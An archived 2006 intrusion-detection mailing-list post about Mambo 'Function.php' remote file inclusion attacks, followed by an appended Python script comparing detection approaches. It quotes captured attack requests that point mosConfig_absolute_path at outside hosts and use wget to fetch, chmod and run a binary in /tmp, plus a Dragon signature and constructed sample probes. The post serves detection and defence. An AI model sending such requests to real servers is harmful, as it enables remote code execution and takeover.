List:       dragonidsuser
Subject:    [Dragonidsuser] mambo attacks/probes
From:       Mike Iglesias <iglesias () draco ! acs ! uci ! edu>
Date:       2006-03-08 19:21:22
Message-ID: 200603081921.k28JLMgo014051 () draco ! acs ! uci ! edu

We had a system or two compromised via the Mambo "Function.php arbitrary
command execution" bug, so we have set up a signature to catch the
probes/attacks when they happen.

Here are a couple of example attacks:

GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo| HTTP/1.1{A}

GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1{A}

Here's the signature we are using to catch these:

T D A S 10 200 W UCI:MAMBO-ATTACK /2fmambo/2f , wget

If you have a better way to catch these, please let me know.


Mike Iglesias                          Email:       iglesias@uci.edu
University of California, Irvine       phone:       949-824-6926
Network & Academic Computing Services  FAX:         949-824-2069
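An added example, not part of Mike's post or of the Dragon sensor, showing the two ways of catching these requests side by side over constructed sample request lines: a string match equivalent to the posted signature (my reading of the rule is "literal `/mambo/` followed by `wget` in the request"), and a check that targets the underlying bug directly by decoding the query string and flagging any `mosConfig_absolute_path` parameter that points at a remote URL. The request lines and hosts below are constructed for the example (RFC 5737 documentation addresses), not taken from the post.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request lines for this example (not from the original post).
# Hosts are RFC 5737 documentation addresses.
SAMPLE_REQUESTS = [
    # Shape of the probe described in the post: remote mosConfig_absolute_path plus a wget command.
    "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&"
    "mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=cd%20/tmp;wget%20192.0.2.10/x;chmod%20744%20x;./x HTTP/1.1",
    # Same bug, but with the path and parameter values percent-encoded.
    "GET /cvs%2fmambo%2findex2.php?GLOBALS=&mosConfig_absolute_path=http%3A%2F%2F198.51.100.7%2Fcmd.gif%3F"
    "&cmd=w%67et%20198.51.100.7%2Fy HTTP/1.1",
    # Ordinary Mambo page view: should not fire.
    "GET /mambo/index.php?option=com_content&task=view&id=5&Itemid=1 HTTP/1.1",
    # Benign request that happens to contain both strings the signature looks for.
    "GET /docs/mambo/wget-notes.html HTTP/1.1",
]

# Value of mosConfig_absolute_path that would make Mambo include code from another host.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into its parts; return None if malformed."""
    parts = line.strip().split()
    if len(parts) != 3 or not parts[2].upper().startswith("HTTP/"):
        return None
    return parts[0], parts[1], parts[2]


def signature_match(target):
    """Equivalent of the posted Dragon rule (assumed reading): '/mambo/' then 'wget', raw bytes."""
    i = target.find("/mambo/")
    return i != -1 and "wget" in target[i:]


def rfi_match(target):
    """Flag the actual bug: a mosConfig_absolute_path parameter carrying a remote URL.

    The query string is decoded first, so percent-encoding of the path or the
    value does not hide the parameter, and no particular install path is assumed.
    """
    query = urlsplit(target).query
    params = parse_qs(query, keep_blank_values=True)  # parse_qs percent-decodes values
    for key, values in params.items():
        # Also covers overrides passed as GLOBALS[mosConfig_absolute_path]=...
        if "mosConfig_absolute_path" in unquote(key):
            if any(REMOTE_SCHEME.match(v) for v in values):
                return True
    return False


def scan(lines):
    """Return (line_number, method, verdicts) for every request that trips either check."""
    hits = []
    for n, line in enumerate(lines, 1):
        parsed = parse_request_line(line)
        if parsed is None:
            continue
        method, target, _version = parsed
        verdict = {"signature": signature_match(target), "rfi": rfi_match(target)}
        if any(verdict.values()):
            hits.append((n, method, verdict))
    return hits


if __name__ == "__main__":
    for n, method, verdict in scan(SAMPLE_REQUESTS):
        print(f"line {n}: {method} signature={verdict['signature']} rfi={verdict['rfi']}")
```

On the sample lines the signature-style match fires on the first request and on the benign documentation request, and misses the percent-encoded probe; the decoded parameter check fires on exactly the two requests that carry a remote `mosConfig_absolute_path`. Matching the parameter after decoding, rather than the `wget` payload, is what makes the check independent of both the install path and the particular download tool in the command string.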
_______________________________________________
Dragonidsuser mailing list